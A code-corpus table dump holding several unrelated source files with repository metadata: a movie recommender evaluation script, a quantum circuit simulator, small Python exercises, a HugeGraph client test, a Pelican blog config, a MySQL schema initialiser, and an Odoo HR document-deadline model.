hexsha (stringlengths 40..40) | size (int64 6..782k) | ext (stringclasses, 7 values) | lang (stringclasses, 1 value) | max_stars_repo_path (stringlengths 4..237) | max_stars_repo_name (stringlengths 6..72) | max_stars_repo_head_hexsha (stringlengths 40..40) | max_stars_repo_licenses (list) | max_stars_count (int64 1..53k ⌀) | max_stars_repo_stars_event_min_datetime (stringlengths 24..24 ⌀) | max_stars_repo_stars_event_max_datetime (stringlengths 24..24 ⌀) | max_issues_repo_path (stringlengths 4..184) | max_issues_repo_name (stringlengths 6..72) | max_issues_repo_head_hexsha (stringlengths 40..40) | max_issues_repo_licenses (list) | max_issues_count (int64 1..27.1k ⌀) | max_issues_repo_issues_event_min_datetime (stringlengths 24..24 ⌀) | max_issues_repo_issues_event_max_datetime (stringlengths 24..24 ⌀) | max_forks_repo_path (stringlengths 4..184) | max_forks_repo_name (stringlengths 6..72) | max_forks_repo_head_hexsha (stringlengths 40..40) | max_forks_repo_licenses (list) | max_forks_count (int64 1..12.2k ⌀) | max_forks_repo_forks_event_min_datetime (stringlengths 24..24 ⌀) | max_forks_repo_forks_event_max_datetime (stringlengths 24..24 ⌀) | content (stringlengths 6..782k) | avg_line_length (float64 2.75..664k) | max_line_length (int64 5..782k) | alphanum_fraction (float64 0..1) |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
165c6758a989f8deab83e310fddd1fe121ef4cc3 | 1,093 | py | Python | Content Based Filtering/ContentRecs.py | uboni/Project-B-Movie-Recommender-System | 77390637a71b112651fcf92b767e27ca0d3ee8c7 | ["MIT"] | 73 | 2019-05-08T05:59:53.000Z | 2022-03-28T16:59:19.000Z | ContentBased/ContentRecs.py | mayank171986/Building-Recommender-Systems-with-Machine-Learning-and-AI | 9e6dc58254ec1a2d2ca64c2f81a37f6390947701 | ["MIT"] | 1 | 2021-02-07T18:01:54.000Z | 2021-02-23T12:26:16.000Z | ContentBased/ContentRecs.py | mayank171986/Building-Recommender-Systems-with-Machine-Learning-and-AI | 9e6dc58254ec1a2d2ca64c2f81a37f6390947701 | ["MIT"] | 43 | 2019-07-18T03:26:22.000Z | 2022-03-10T22:03:33.000Z |
# -*- coding: utf-8 -*-
"""
Created on Fri May 4 16:25:39 2018
@author: Frank
"""
from MovieLens import MovieLens
from ContentKNNAlgorithm import ContentKNNAlgorithm
from Evaluator import Evaluator
from surprise import NormalPredictor
import random
import numpy as np
def LoadMovieLensData():
ml = MovieLens()
print("Loading movie ratings...")
data = ml.loadMovieLensLatestSmall()
print("\nComputing movie popularity ranks so we can measure novelty later...")
rankings = ml.getPopularityRanks()
return (ml, data, rankings)
np.random.seed(0)
random.seed(0)
# Load up common data set for the recommender algorithms
(ml, evaluationData, rankings) = LoadMovieLensData()
# Construct an Evaluator to, you know, evaluate them
evaluator = Evaluator(evaluationData, rankings)
contentKNN = ContentKNNAlgorithm()
evaluator.AddAlgorithm(contentKNN, "ContentKNN")
# Just make random recommendations
Random = NormalPredictor()
evaluator.AddAlgorithm(Random, "Random")
evaluator.Evaluate(False)
evaluator.SampleTopNRecs(ml)
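# A minimal cross-validation sanity check (a hedged sketch, not part of the
# original script): it assumes loadMovieLensLatestSmall() returns a surprise
# Dataset, which its use with surprise algorithms above suggests.
#
#   from surprise.model_selection import cross_validate
#   cross_validate(NormalPredictor(), evaluationData, measures=['RMSE', 'MAE'], cv=5, verbose=True)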
| 23.76087 | 83 | 0.729186 |
16c3995ab0c7ca8ca792150087c946c8acc9f38d | 10,458 | py | Python | utils.py | yue1234567/QuantumCircuitZJY | 097275a633bc0f0c92bb14ad63e94f460fa8567d | ["Apache-2.0"] | 1 | 2021-06-15T11:19:43.000Z | 2021-06-15T11:19:43.000Z | utils.py | yue1234567/QuantumCircuitZJY | 097275a633bc0f0c92bb14ad63e94f460fa8567d | ["Apache-2.0"] | null | null | null | utils.py | yue1234567/QuantumCircuitZJY | 097275a633bc0f0c92bb14ad63e94f460fa8567d | ["Apache-2.0"] | null | null | null |
import numpy as np
from tqdm import tqdm
from ops import tensor_product, quantum_one, quantum_zero, quantum_eye, quantum_flip, MakeR, EPS, Fidelity, NormalizeAngle
class EnumAllCNOT(object):
def __init__(self, quantum_count, layer_count):
self.quantum_count = quantum_count
self.layer_count = layer_count
self.size = (quantum_count*(quantum_count-1))**layer_count
self.gen = self.Generator()
pass
def Generator(self):
cnot = np.zeros([self.layer_count, 2], dtype=int)
code = np.zeros([self.layer_count], dtype=int)
sel = []
for i in range(self.quantum_count):
for j in range(i+1, self.quantum_count):
sel.append((i, j))
sel.append((j, i))
D = len(sel)
while True:
for i in range(self.layer_count):
cnot[i]=sel[code[i]]
yield cnot
code[0]+=1
for i in range(self.layer_count):
if code[i]==D:
code[i]=0
if i+1<self.layer_count:
code[i+1]+=1
else:
break
def __len__(self):
return self.size
def __call__(self):
return self.gen.__next__()
def RandomCNOT(quantum_count):
i=j=0
while j==i:
i, j = np.random.randint(quantum_count, size=2)
return i, j
def RandomCNOTs(quantum_count, layer_count):
cnot = np.zeros([layer_count, 2], dtype=int)
for c in range(layer_count):
cnot[c, :] = RandomCNOT(quantum_count)
return cnot
class QSystem(object):
def __init__(self, layer_list, normalize=True):
self.layer_list = layer_list
self.quantum_count = layer_list[0].quantum_count
if normalize:
self.Normalize()
def __call__(self, quantum_status):
'''quantum_status: list or vector(np.matrix)'''
if isinstance(quantum_status, list):
quantum_status = tensor_product(quantum_status)
for layer in self.layer_list:
quantum_status = layer(quantum_status)
return quantum_status
def __len__(self):
return len(self.layer_list)
def Normalize(self):
for layer in self.layer_list:
if isinstance(layer, RLayer):
layer.Normalize()
@property
def matrix(self):
I = quantum_eye(self.quantum_count)
for layer in self.layer_list:
I = layer.matrix*I
return I
@property
def string(self):
return ''.join([layer.string for layer in self.layer_list])
class QLayer(object):
'''base layer'''
def __init__(self, quantum_count):
self.quantum_count = quantum_count
@property
def matrix(self):
'''get the matrix of the layer'''
        raise NotImplementedError('matrix must be implemented by subclasses.')
@property
def string(self):
        raise NotImplementedError('string must be implemented by subclasses.')
def __call__(self, quantum_status):
if isinstance(quantum_status, list):
quantum_status = tensor_product(quantum_status)
# print(type(self.matrix), type(quantum_status))
return self.matrix * quantum_status
class RLayer(QLayer):
    '''Rotation gate layer'''
def __init__(self, thetas, **kwargs):
super(RLayer, self).__init__(**kwargs)
if len(thetas) != self.quantum_count:
raise ValueError('theta count must be equal to quantum_count.')
self.thetas = thetas
def Normalize(self):
self.thetas = [NormalizeAngle(t) for t in self.thetas]
@property
def matrix(self):
return tensor_product([MakeR(t) for t in self.thetas])
@property
def string(self):
return ''.join(['R %d %.16f\n'%(i, t) for i,t in enumerate(self.thetas) if abs(t)>1e-8])
# return ''.join(['R %d %.16f\n'%(i, t) for i,t in enumerate(self.thetas)])
class CLayer(QLayer):
    '''Controlled-NOT (CNOT) gate layer'''
def __init__(self, control_quantum, target_quantum, **kwargs):
super(CLayer, self).__init__(**kwargs)
if control_quantum>=self.quantum_count or target_quantum>=self.quantum_count or control_quantum==target_quantum:
raise ValueError('control=%d and target=%d is wrong in CLayer with quantum_count=%d'%(control_quantum, target_quantum, self.quantum_count))
self.control_quantum = control_quantum
self.target_quantum = target_quantum
@property
def matrix(self):
bit_c = 1<<(self.quantum_count-self.control_quantum-1)
bit_t = 1<<(self.quantum_count-self.target_quantum-1)
A = quantum_eye(self.quantum_count)
for i in range(1<<self.quantum_count):
if (i&bit_c)==bit_c and (i&bit_t)==0:
j = i|bit_t
A[[i,j],:]=A[[j,i],:]
return A
@property
def string(self):
return 'C %d %d\n'%(self.control_quantum, self.target_quantum)
class ILayer(QLayer):
    '''Identity gate layer'''
@property
def matrix(self):
return quantum_eye(self.quantum_count)
@property
def string(self):
return 'I\n'
def ParseToQSystem(s, quantum_count):
    '''Cannot be used for the case of multiple stacked R layers.'''
layers = []
thetas = [0]*quantum_count
for line in s.split('\n'):
line = line.strip()
if len(line)!=0:
mark, p1, p2 = line.split(' ')
if mark == 'R':
# thetas = [0]*quantum_count
thetas[int(p1)]=float(p2)
elif mark == 'C':
layers.append(RLayer(thetas, quantum_count=quantum_count))
layers.append(CLayer(int(p1), int(p2), quantum_count=quantum_count))
thetas = [0]*quantum_count
if sum([abs(t) for t in thetas])>0:
layers.append(RLayer(thetas, quantum_count=quantum_count))
return QSystem(layers)
def CostCompute(s):
sc=0
for line in s.split('\n'):
if len(line)>0:
if line[0]=='R':
sc+=1
elif line[0]=='C':
sc+=8
return sc
def SearchParams(U, quantum_count, cnot_layers, EPOCH_STAGE_1=10000, EPOCH_STAGE_2=1000):
def MakeSystem(params, quantum_count=quantum_count, cnot_layers=cnot_layers):
layers = [RLayer(list(params[0]), quantum_count=quantum_count)]
for i, (c, t) in enumerate(cnot_layers):
layers.append(CLayer(c, t, quantum_count=quantum_count))
layers.append(RLayer(list(params[i+1]), quantum_count=quantum_count))
return QSystem(layers)
best_score = 0
param_size = (len(cnot_layers)+1, quantum_count)
for epoch in tqdm(range(EPOCH_STAGE_1)):
params = np.random.uniform(0, 2*np.pi, size=param_size)
model = MakeSystem(params)
M = model.matrix
score = Fidelity(U, M)
if score>best_score:
# print('epoch_%d, score = %g'%(epoch, score))
best_score = score
best_param = params
best_model = model.string
for eps in tqdm([1e-1, 1e-2, 1e-3, 1e-4, 1e-5, 1e-6, 1e-7, 1e-8]):
for epoch in range(EPOCH_STAGE_2):
dt = np.random.uniform(-eps, eps, size=param_size)
params = best_param+dt
model = MakeSystem(params)
score = Fidelity(U, model.matrix)
if score>best_score:
# print('eps=%g, epoch=%d, score = %g'%(eps, epoch, score))
best_score = score
best_param = params
best_model = model.string
return best_score, best_model
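# Typical use of SearchParams (a hedged sketch relying only on names defined
# in this file): pick a CNOT layout, then fit the rotation angles to a target
# unitary U via random search followed by local refinement.
#
#   cnots = RandomCNOTs(quantum_count=3, layer_count=2)
#   best_score, best_model = SearchParams(U, 3, cnots)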
def Minimize(func, x_min, x_max, EPS=1e-8):
alpha = (np.sqrt(5)-1)/2 # 0.618
x0=x_min
x3=x_max
x1=x3-alpha*(x3-x0)
x2=x0+alpha*(x3-x0)
y1=func(x1)
y2=func(x2)
while x2-x0>EPS:
        if y1 > y2:  # the minimum lies in the right bracket [x1, x3]
x0=x1
x1=x2
y1=y2
x2=x0+alpha*(x3-x0)
y2=func(x2)
else:
x3=x2
x2=x1
y2=y1
x1=x3-alpha*(x3-x0)
y1=func(x1)
x = (x1+x2)/2
return x
if __name__ == '__main__':
layer1 = RLayer([0, 1.5], quantum_count=2)
layer2 = ILayer(quantum_count=2)
layer3 = RLayer([0, 1.5], quantum_count=2)
model = QSystem([layer1, layer2, layer3])
print('Model matrix:')
print(model.matrix)
q0 = quantum_zero()
q1 = quantum_one()
q = tensor_product([q0, q1])
print('Quantum status:')
print(model(q).transpose())
print('Model string:')
print(model.string)
print('Test C2Layer')
C2Layer = lambda:CLayer(0,1,quantum_count=2)
model = C2Layer()
q0 = quantum_zero()
q1 = quantum_one()
q = tensor_product([q0, q1])
print('Init status:')
print(q.transpose())
print('After C2Layer:')
print(model(q).transpose())
print()
q = tensor_product([q1, q0])
print('Init status:')
print(q.transpose())
print('After C2Layer:')
print(model(q).transpose())
print()
q = tensor_product([q0, q0])
print('Init status:')
print(q.transpose())
print('After C2Layer:')
print(model(q).transpose())
print()
q = tensor_product([q1, q1])
print('Init status:')
print(q.transpose())
print('After C2Layer:')
print(model(q).transpose())
print('CNOT(0,1):')
layer = CLayer(0,1,quantum_count=2)
print(layer.matrix, '\n')
print('CNOT(1,0):')
layer = CLayer(1,0,quantum_count=2)
print(layer.matrix, '\n')
print('CNOT(1,2):')
layer = CLayer(1,2,quantum_count=3)
print(layer.matrix, '\n')
print('CNOT(2,0):')
layer = CLayer(2,0,quantum_count=3)
print(layer.matrix, '\n')
print('Test enum:')
creator = EnumAllCNOT(3, 2)
print('len = ', len(creator))
for _ in range(5):
print(creator())
from Reader import ReadSystem
S1 = QSystem([
RLayer([-0.5,0,8], quantum_count=3),
CLayer(1, 2, quantum_count=3),
RLayer([-1.5,1,3], quantum_count=3),
], normalize=False)
U1 = S1.matrix
print('Before:')
print(S1.string)
S1.Normalize()
print('After:')
print(S1.string)
U2 = S1.matrix
print('Fidelity:', Fidelity(U1, U2))
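    # Extra checks (a hedged addition, not in the original file) that exercise
    # two helpers defined above using only in-file names.
    print('Circuit cost of S1:', CostCompute(S1.string))  # each R line costs 1, each C line costs 8
    x_star = Minimize(lambda x: (x - 1.2) ** 2, 0.0, 3.0)  # golden-section search
    print('argmin of (x - 1.2)^2 on [0, 3]:', x_star)      # expect a value near 1.2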
| 31.405405 | 152 | 0.566265 |
4c0c8145a3473773605b7beb636b70a124d80710 | 228 | py | Python | Curso_Python/Secao2-Python-Basico-Logica-Programacao/35for_else/35for_else.py | pedrohd21/Cursos-Feitos | b223aad83867bfa45ad161d133e33c2c200d42bd | ["MIT"] | null | null | null | Curso_Python/Secao2-Python-Basico-Logica-Programacao/35for_else/35for_else.py | pedrohd21/Cursos-Feitos | b223aad83867bfa45ad161d133e33c2c200d42bd | ["MIT"] | null | null | null | Curso_Python/Secao2-Python-Basico-Logica-Programacao/35for_else/35for_else.py | pedrohd21/Cursos-Feitos | b223aad83867bfa45ad161d133e33c2c200d42bd | ["MIT"] | null | null | null |
"""
For / Else em python
"""
variavel = ['Luiz Otavio', 'Joãozinho', 'Maria']
for valor in variavel:
print(valor)
if valor.startswith('M'):
print('Começa com J', valor)
else:
print('Não começa com J')
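# The for/else construct the file name refers to (a hedged illustrative
# addition): the else block runs only when the loop finishes without break.
for valor in variavel:
    if valor.startswith('X'):
        print('Found a name starting with X:', valor)
        break
else:
    print('No name starts with X')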
| 22.8 | 48 | 0.592105 |
d5dd2ca3988da35c7474b49e0ec3dbdf7606fe39 | 3,846 | py | Python | graph-test.py | WeiwenRen/PyHugeGraph | e09430da5a5b93fbafd1de02f8c4545bd1f0afd7 | ["Apache-2.0"] | 11 | 2018-09-06T10:36:02.000Z | 2021-03-18T16:15:30.000Z | graph-test.py | WeiwenRen/PyHugeGraph | e09430da5a5b93fbafd1de02f8c4545bd1f0afd7 | ["Apache-2.0"] | null | null | null | graph-test.py | WeiwenRen/PyHugeGraph | e09430da5a5b93fbafd1de02f8c4545bd1f0afd7 | ["Apache-2.0"] | 2 | 2019-12-09T07:21:04.000Z | 2021-06-07T02:30:10.000Z |
from PyHugeGraph import PyHugeGraphClient
if __name__ == '__main__':
    hg = PyHugeGraphClient.HugeGraphClient("http://localhost:8090", "hugegraph")
    print(hg.graph)
    print(hg.get_all_graphs().response)
    print(hg.get_vertex_by_id("123").response)
    print(hg.get_all_vertelabels().response)
# print hg.GetAllGraphs().response
# print hg.GetVersion().response
# print hg.GetGraphInfo().response
# print hg.CreatePropertyKey('testname', 'TEXT', 'SINGLE').response
    print(hg.get_graph_allpropertykeys().response)
# print hg.GetGraphPropertykeysByName("testname").response
# print hg.DeleteGraphPropertykeysByName("curltest").status_code
# user_data = {
# "min": 0,
# "max": 100
# }
# print hg.AddPropertykeyUserdata("age",user_data).response
# print hg.DeletePropertykeyUserdata("age", {"min": 0}).response
# ------------------------------------------
# data = {
# "name": "person",
# "id_strategy": "DEFAULT",
# "properties": [
# "name",
# "age"
# ],
# "primary_keys": [
# "name"
# ],
# "nullable_keys": [],
# "enable_label_index": True
# }
# print hg.CreateVertexLabel(data).response
# properties = ["reason",]
# userdata = {
# "super": "animal"
# }
# print hg.AddVertexLabelProperties("person",properties).response
# print hg.AddVertexLabelUserdata("person",userdata).response
# print hg.DeleteVertexLabelUserdata("person",userdata).response
# print hg.GetVerteLabelByName("person").response
# print hg.GetAllVerteLabels().response
# ------------------------------------------
# data = {
# "name": "created",
# "source_label": "person",
# "target_label": "person",
# "frequency": "SINGLE",
# "properties": [
# "time"
# ],
# "sort_keys": [],
# "nullable_keys": [],
# "enable_label_index": True
# }
# # print hg.CreateEdgeLabel(data).response
# properties = [
# "type"
# ]
# nullable_keys = [
# "type"
# ]
# # print hg.AddEdgeLabelProperties("created", properties, nullable_keys).response
# userdata = {
# "min": "1970-01-01"
# }
# # print hg.AddEdgeLabelUserdata("created",userdata).response
# # print hg.DeleteEdgeLabelUserdata("created",userdata).response
# print hg.GetEdgeLabelByName("created").response
# print hg.GetEdgeLabelByName("created").status_code
# print hg.DeleteEdgeLabelByName("created").response
# print hg.GetEdgeLabelByName("created").response
# # print hg.GetAllEdgeLabels().response
# print hg.GetVertexByCondition("character").response
# print hg.GetVertexById("1:hydra").response
# print hg.GetVertexByCondition("").response
# print hg.GetVertexByPage(4, "AAuGMTpoeWRyYWcBEQAAAAA=").response
# print hg.GetEdgeByCondition().response
# print hg.GetEdgeByPage(3).response
# print hg.GetEdgeByID("S1:pluto>4>>S2:tartarus").response
# print hg.TraverserShortestPath("1:hercules", "1:pluto", "OUT", 2).response
# print hg.TraverserKout("1:hercules", "OUT", 1).response
# print hg.TraverserKneighbor("1:hercules", "OUT", 2).response
# ids = ["1:jupiter", "1:cerberus", "2:tartarus", "1:alcmene", "1:hydra", "2:sky", "1:saturn", "1:pluto",
# "1:hercules", "1:neptune", "1:nemean"]
# print hg.TraverserVertices(ids).response
# print hg.CreateVariables("title","test").response
# print hg.UpdateVariables("title","testnew").response
# print hg.GetAllVariables().response
# print hg.GetVariablesByKey("title").response
# print hg.DeleteVariables("title").response
# print hg.GetAllVariables().response
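    # A hedged sketch (not in the original file): the wrapper objects above
    # expose both .response and .status_code, so a call can be guarded on its
    # HTTP status before the body is used, assuming requests-style integer codes.
    resp = hg.get_all_graphs()
    if resp.status_code == 200:
        print(resp.response)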
| 38.46 | 109 | 0.615705 |
e69559ebb952b172d5826c0b1ff0fedb231d8b03 | 408 | py | Python | addition_module/face_mask_adding/FMA-3D/utils/cython/setup.py | weihaoxie/FaceX-Zoo | db0b087e4f4d28152e172d6c8d3767a8870733b4 | ["Apache-2.0"] | 1,329 | 2021-01-13T07:06:30.000Z | 2022-03-31T07:23:39.000Z | addition_module/face_mask_adding/FMA-3D/utils/cython/setup.py | weihaoxie/FaceX-Zoo | db0b087e4f4d28152e172d6c8d3767a8870733b4 | ["Apache-2.0"] | 115 | 2021-01-13T10:42:57.000Z | 2022-03-28T03:57:52.000Z | addition_module/face_mask_adding/FMA-3D/utils/cython/setup.py | weihaoxie/FaceX-Zoo | db0b087e4f4d28152e172d6c8d3767a8870733b4 | ["Apache-2.0"] | 351 | 2021-01-13T07:21:00.000Z | 2022-03-29T14:11:39.000Z |
'''
@author: cbwces
@date: 20210419
@contact: [email protected]
'''
from setuptools import setup, Extension
from Cython.Build import cythonize
import numpy
ext_modules = [
Extension(
"render",
["render.pyx"],
extra_compile_args=['-fopenmp'],
extra_link_args=['-fopenmp'],
)
]
setup(
ext_modules=cythonize(ext_modules),
include_dirs=[numpy.get_include()]
)
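# Standard build workflow for a Cython extension like this one (a hedged note,
# not in the original file): run `python setup.py build_ext --inplace` next to
# render.pyx, after which `import render` loads the compiled module. The
# -fopenmp flags assume a compiler with OpenMP support, such as gcc.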
| 17.73913 | 40 | 0.659314 |
5d4962ebca12db7d9c5d60c7a06167558d7495d4 | 1,245 | py | Python | chapter_seven/building_a_python_model/numpy_model.py | PacktPublishing/Speed-up-your-Python-with-Rust | 1fce5fb59ea966015768e7eca51c0e31d69531ec | ["MIT"] | 21 | 2021-09-10T12:46:26.000Z | 2022-03-23T02:50:39.000Z | chapter_seven/building_a_python_model/numpy_model.py | PacktPublishing/Speed-up-your-Python-with-Rust | 1fce5fb59ea966015768e7eca51c0e31d69531ec | ["MIT"] | null | null | null | chapter_seven/building_a_python_model/numpy_model.py | PacktPublishing/Speed-up-your-Python-with-Rust | 1fce5fb59ea966015768e7eca51c0e31d69531ec | ["MIT"] | 6 | 2021-09-02T08:32:37.000Z | 2022-03-17T21:15:25.000Z |
import numpy as np
class MatrixModel:
@property
    def weights_matrix(self) -> np.ndarray:
return np.array([
[3, 2],
[1, 4]
])
def calculate_times(self, distance: int,
traffic_grade: int) -> dict:
inputs = np.array([
[distance],
[traffic_grade]
])
result = np.dot(self.weights_matrix, inputs)
return {
"car time": result[0][0],
"truck time": result[1][0]
}
def calculate_parameters(self, car_time: int,
truck_time: int) -> dict:
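        # Inverting the weights matrix recovers the inputs (distance, traffic
        # grade) from the outputs (car time, truck time): x = W^(-1) @ y.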
inputs = np.array([
[car_time],
[truck_time]
])
result = np.dot(np.linalg.inv(self.weights_matrix),
inputs)
return {
"distance": result[0][0],
"traffic grade": result[1][0]
}
if __name__ == "__main__":
test = MatrixModel()
times = test.calculate_times(distance=10, traffic_grade=3)
print(f"here are the times: {times}")
parameters = test.calculate_parameters(
car_time=times["car time"], truck_time=times["truck time"]
)
print(f"here are the parameters: {parameters}")
| 24.411765 | 66 | 0.513253 |
53cf91710589936dd8752f38b18fc803aedf413e | 2,239 | py | Python | pelicanconf.py | pythonquick/innernet-blog | d62ad9b64a93ea1539d15827a7940837f87f3175 | ["MIT"] | null | null | null | pelicanconf.py | pythonquick/innernet-blog | d62ad9b64a93ea1539d15827a7940837f87f3175 | ["MIT"] | null | null | null | pelicanconf.py | pythonquick/innernet-blog | d62ad9b64a93ea1539d15827a7940837f87f3175 | ["MIT"] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*- #
from __future__ import unicode_literals
import os
AUTHOR = 'Guenther'
SITENAME = 'innernet'
SITEURL = 'http://localhost:8000'
SITELOGO = 'https://s.gravatar.com/avatar/fcfe36f97f3eb56b69ecce65d0c895dc?s=80'
ROBOTS = 'index, follow'
SITEMAP = {
'format': 'xml',
'priorities': {
'articles': 0.5,
'indexes': 0.5,
'pages': 0.5
},
'changefreqs': {
'articles': 'monthly',
'indexes': 'daily',
'pages': 'monthly'
}
}
PATH = 'content'
#THEME = '../pelican-themes/Flex'
#THEME = '../github/Flex'
#THEME = '../github/lannisport'
#THEME = '../github/pelican-mg'
#THEME = '../github/MinimalXY'
#THEME = '../github/pelican-cait'
THEME = '../github/plumage'
#THEME = '../github/pelican-elegant'
MENUITEMS = (('Categories', '/categories.html'),
('Tags', '/tags.html'),
('Archives', '/archives.html'),)
MAIN_MENU = True
TIMEZONE = 'America/New_York'
DEFAULT_LANG = 'en'
# Feed generation is usually not desired when developing
FEED_ALL_ATOM = None
CATEGORY_FEED_ATOM = None
TRANSLATION_FEED_ATOM = None
AUTHOR_FEED_ATOM = None
AUTHOR_FEED_RSS = None
DISPLAY_CATEGORIES_ON_MENU = False
# Blogroll
#LINKS = (('Pelican', 'http://getpelican.com/'),
# ('Python.org', 'http://python.org/'),
# ('You can squash those links in your config file', '#'),)
LINKS = ()
# Social widget
SOCIAL = (('GitHub', 'https://github.com/pythonquick'),
('Twitter', 'https://twitter.com/pythonquick'),)
DEFAULT_PAGINATION = 10
PLUGIN_PATHS = ['../github/pelican-plugins']
#PLUGINS = ['gravatar', u'disqus_static', 'sitemap']
PLUGINS = ['gravatar', 'sitemap']
#DISQUS_SITENAME = u'innernet-1'
#DISQUS_SECRET_KEY = os.environ["DISQUS_SECRET_KEY"]
#DISQUS_PUBLIC_KEY = u'jHOTvv9aBxf7cXnuBJpPne1SHzMNwMZLFghMrhzBVAx0m3fomH3yulPKaaXJW0k4'
#COPYRIGHT = u'© 2018 Guenther Haeussermann'
SITE_THUMBNAIL = 'https://s.gravatar.com/avatar/fcfe36f97f3eb56b69ecce65d0c895dc?s=80'
STATIC_PATHS = ["extras"]
EXTRA_PATH_METADATA = {
'extras/robots.txt': {'path': 'robots.txt'}
}
# Uncomment following line if you want document-relative URLs when developing
#RELATIVE_URLS = True
SITESUBTITLE = "A developer's blog"
| 26.975904 | 88 | 0.670835 |
54fef41e30838bf329ca8f50c5ce5e2a5fa44c17 | 268 | py | Python | 7-assets/past-student-repos/LambdaSchool-master/m6/61b1/src/item.py | eengineergz/Lambda | 1fe511f7ef550aed998b75c18a432abf6ab41c5f | ["MIT"] | null | null | null | 7-assets/past-student-repos/LambdaSchool-master/m6/61b1/src/item.py | eengineergz/Lambda | 1fe511f7ef550aed998b75c18a432abf6ab41c5f | ["MIT"] | null | null | null | 7-assets/past-student-repos/LambdaSchool-master/m6/61b1/src/item.py | eengineergz/Lambda | 1fe511f7ef550aed998b75c18a432abf6ab41c5f | ["MIT"] | null | null | null |
# items implementation
class Item:
def __init__(self, item_name, item_description):
self.item_name = item_name
self.item_description = item_description
def __str__(self):
return '%s, %s' % (self.item_name, self.item_description)
| 24.363636 | 65 | 0.675373 |
ab4ebd6255f4b428c623c0dbbaaf9eb0ccdea384 | 429 | py | Python | INBa/2015/ZORIN_D_I/task_2_7.py | YukkaSarasti/pythonintask | eadf4245abb65f4400a3bae30a4256b4658e009c | ["Apache-2.0"] | null | null | null | INBa/2015/ZORIN_D_I/task_2_7.py | YukkaSarasti/pythonintask | eadf4245abb65f4400a3bae30a4256b4658e009c | ["Apache-2.0"] | null | null | null | INBa/2015/ZORIN_D_I/task_2_7.py | YukkaSarasti/pythonintask | eadf4245abb65f4400a3bae30a4256b4658e009c | ["Apache-2.0"] | null | null | null |
# Task 2. Variant 7.
# Write a program that prints your favourite quotation by Stendhal. Remember that the author must be credited on a separate line.
# Krasnikov A. S.
# 19.03.2016
print("Let us work, for work is the father of pleasure.")
print("\n\n Stendhal")
input("\n\nPress Enter to exit.")
| 53.625 | 201 | 0.689977 |
91e5a09ac4781c9aa53955f5af697cf6376d37fc | 1,634 | py | Python | db_init.py | AuxiliumCDNG/MET-Bot | 7e00d878c92ad4f68b0b2920235019e14c9ea2fa | ["MIT"] | null | null | null | db_init.py | AuxiliumCDNG/MET-Bot | 7e00d878c92ad4f68b0b2920235019e14c9ea2fa | ["MIT"] | null | null | null | db_init.py | AuxiliumCDNG/MET-Bot | 7e00d878c92ad4f68b0b2920235019e14c9ea2fa | ["MIT"] | null | null | null |
from globals import connection_pool
def init():
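    # Idempotent schema bootstrap: every statement below uses IF NOT EXISTS,
    # so init() can safely be called on every start-up.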
with connection_pool.connection() as con, con.cursor(dictionary=True) as cursor:
cursor.execute("CREATE TABLE IF NOT EXISTS settings ("
"id INT PRIMARY KEY NOT NULL AUTO_INCREMENT,"
"setting VARCHAR(100),"
"value VARCHAR(100)"
")")
cursor.execute("CREATE TABLE IF NOT EXISTS konvois ("
"id INT PRIMARY KEY NOT NULL AUTO_INCREMENT,"
"name VARCHAR(255),"
"description TEXT,"
"truckersmp TEXT,"
"date DATE,"
"gather TIME,"
"time TIME,"
"start VARCHAR(255),"
"finish VARCHAR(255),"
"pause VARCHAR(255),"
"server VARCHAR(255),"
"token VARCHAR(100)"
")")
cursor.execute("CREATE TABLE IF NOT EXISTS konvoi_updates ("
"id INT PRIMARY KEY NOT NULL AUTO_INCREMENT,"
"konvoi_id INT,"
"text TEXT,"
"picture MEDIUMBLOB"
")")
cursor.execute("CREATE TABLE IF NOT EXISTS presence ("
"id INT PRIMARY KEY NOT NULL AUTO_INCREMENT,"
"user_id BIGINT UNSIGNED,"
"konvoi_id INT,"
"status VARCHAR(255)"
")")
con.commit()
| 43 | 84 | 0.433905 |
53693c2098532b89e5b246198bb277e313c22d49 | 3,612 | py | Python | models/hr_employee.py | DevCriUd/hr_cgt | 5db7c173b937fd156b365d17ddf9bd6d86638315 | ["Apache-2.0"] | null | null | null | models/hr_employee.py | DevCriUd/hr_cgt | 5db7c173b937fd156b365d17ddf9bd6d86638315 | ["Apache-2.0"] | null | null | null | models/hr_employee.py | DevCriUd/hr_cgt | 5db7c173b937fd156b365d17ddf9bd6d86638315 | ["Apache-2.0"] | null | null | null |
# -*- coding: utf-8 -*-
from odoo import models, fields, api, _
from odoo.exceptions import ValidationError
class FullEmployee(models.Model):
_inherit = 'hr.employee'
# Compute
@api.multi
def _compute_documents_count(self):
docs = self.env['hr.documents']
for employee in self:
employee.documents_count = docs.search_count(
[('employee', '=', employee.id)]
)
@api.multi
def _compute_documents_reminder(self):
today = fields.Date.from_string(fields.Date.today())
for record in self:
# init
deadline_expired = False
deadline_warning = False
deadline_total = 0
deadline_name = ''
diff_record = float("inf")
log_documents = self.env['hr.documents'].search(
[
('employee', '=', record.id),
('state', '=', 'todo')
]
)
# for each documents linked
for document in log_documents:
# check deadline by date
if document.deadline_date:
deadline_date_obj = fields.Date.from_string(
document.deadline_date
)
diff = (deadline_date_obj - today).days
if diff < 0:
                        # deadline date already passed
deadline_expired = True
deadline_total += 1
elif (diff >= 0 and
diff < document.default_warning_limit_date_hr):
                        # deadline date inside the warning window
deadline_warning = True
deadline_total += 1
if diff < diff_record:
# save documents name if this
# is a more immediate deadline
deadline_name = document.document_type.name
diff_record = diff
record.deadline_expired = deadline_expired
record.deadline_warning = deadline_warning
record.deadline_total = deadline_total - 1
record.deadline_name = deadline_name
# Fields
driver_vector_info = fields.Text(
string='Driver Vector info'
)
documents_count = fields.Integer(
string='Documents',
compute=_compute_documents_count
)
log_documents = fields.One2many(
comodel_name='hr.documents',
inverse_name='employee',
string='Documents'
)
deadline_expired = fields.Boolean(
string='Document Expired',
compute=_compute_documents_reminder
)
deadline_warning = fields.Boolean(
string='Document Expiration Warning',
compute=_compute_documents_reminder
)
deadline_total = fields.Integer(
compute=_compute_documents_reminder
)
deadline_name = fields.Char(
compute=_compute_documents_reminder
)
# Methods
@api.multi
def return_action_to_open_empl(self):
self.ensure_one()
xml_id = self.env.context.get('xml_id')
if xml_id:
res = self.env['ir.actions.act_window'].for_xml_id(
'hr_cgt', xml_id
)
res.update(
context=dict(
self.env.context,
default_employee=self.id,
group_by=False),
domain=[('employee', '=', self.id)]
)
return res
return False
| 29.129032 | 73 | 0.527685 |
